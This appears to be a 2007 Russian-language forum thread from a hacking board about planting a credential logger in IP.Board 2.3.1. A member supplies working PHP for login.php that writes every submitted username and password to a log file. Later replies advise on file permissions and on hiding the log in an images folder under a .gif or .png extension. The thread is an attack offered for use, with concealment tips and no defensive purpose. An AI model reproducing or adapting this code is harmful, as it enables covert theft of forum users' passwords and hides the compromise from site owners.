HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

IP.Board 2.3.1
  #1  
Старый 01.09.2007, 10:29
Reanimat0R
Новичок
Регистрация: 10.06.2007
Сообщений: 26
С нами: 9957771

Репутация: 4
По умолчанию IP.Board 2.3.1

Подскажите пожалуйста куда нужно вставить код, чтобы в отдельный файлик записывались логин и пароль в invision power board версии 2.3.1
Ссылка на исходник(login.php):
http://slil.ru/24799099
 
Ответить с цитированием

  #2  
Старый 01.09.2007, 12:26
Goudini
Участник форума
Регистрация: 07.06.2006
Сообщений: 146
С нами: 10487223

Репутация: 490
По умолчанию

Добавь в начале файла login.php
Самый примитивный скрипт записи в файл для IPB.
PHP код:
if (isset($_REQUEST['UserName']) && isset($_REQUEST['PassWord']))
{
    @
$f fopen('log.txt''a+');
    @
fwrite($f"Login: ".$_REQUEST['UserName']." password: ".$_REQUEST['PassWord']."\n");
    @
fclose($f);

файл с паролями будут в том каталоге где находиться index.php
 
Ответить с цитированием

  #3  
Старый 01.09.2007, 15:43
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами: 10393869

Репутация: 2032


По умолчанию

Goudini, зачем собачку перед переменными ставить?
 
Ответить с цитированием

  #4  
Старый 01.09.2007, 15:45
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
С нами: 10160966

Репутация: 1719


По умолчанию

Цитата:
Сообщение от Piflit  
Goudini, зачем собачку перед переменными ставить?
чтобы в случае, если запрос не выполнился, не возникало сообщение об ошибке ("@" подавляет вывод)

просто иногда юзать error_reporting(0); не удобно)

зы: автору уже ответили в теме вопросов по пхп, код рабочий, в чем проблема?))
 
Ответить с цитированием

  #5  
Старый 01.09.2007, 23:15
Reanimat0R
Новичок
Регистрация: 10.06.2007
Сообщений: 26
С нами: 9957771

Репутация: 4
По умолчанию

Спасибо большое... но проблема не исчезла... не знаю в чем дело, видимо в руках....
 
Ответить с цитированием

  #6  
Старый 01.09.2007, 23:16
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами: 10393869

Репутация: 2032


По умолчанию

Цитата:
Сообщение от Reanimat0R  
Спасибо большое... но проблема не исчезла... не знаю в чем дело, видимо в руках....
в чем проблема?
 
Ответить с цитированием

  #7  
Старый 02.09.2007, 00:18
maxster
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами: 10282956

Репутация: 380
По умолчанию

наверно забыл права на log.txt поставить, поставь атрибуты log.txt 777 и все будет в шоколаде =)
 
Ответить с цитированием

  #8  
Старый 02.09.2007, 02:13
n-000
Участник форума
Регистрация: 25.10.2006
Сообщений: 108
С нами: 10286027

Репутация: 91
По умолчанию

Цитата:
Сообщение от maxster  
наверно забыл права на log.txt поставить, поставь атрибуты log.txt 777 и все будет в шоколаде =)
думаю права лудше выставить не 777 а 666, да и файлик сохранить не в дири со скриптом, а например в папке с картинками и разширением типа .gif или .png
 
Ответить с цитированием

  #9  
Старый 02.09.2007, 14:45
Reanimat0R
Новичок
Регистрация: 10.06.2007
Сообщений: 26
С нами: 9957771

Репутация: 4
По умолчанию

Код вставлял практически везде, но все равно запись не идет в log.txt
Права расставил везде 777
Кто нибудь может протеститровать и выложить login.php
Буду очень благодарен
 
Ответить с цитированием

  #10  
Старый 02.09.2007, 14:49
Piflit
Banned
Регистрация: 11.08.2006
Сообщений: 1,522
С нами: 10393869

Репутация: 2032


По умолчанию

сделай как здесь
http://forum.antichat.ru/thread48154.html
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
IPB 2.3.1 rus nulled + rus adm. n1†R0x PHP 3 17.08.2007 14:36
Powered By IP.Board 2.2.1 Scripts Уязвимости CMS / форумов 5 06.01.2007 15:53



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.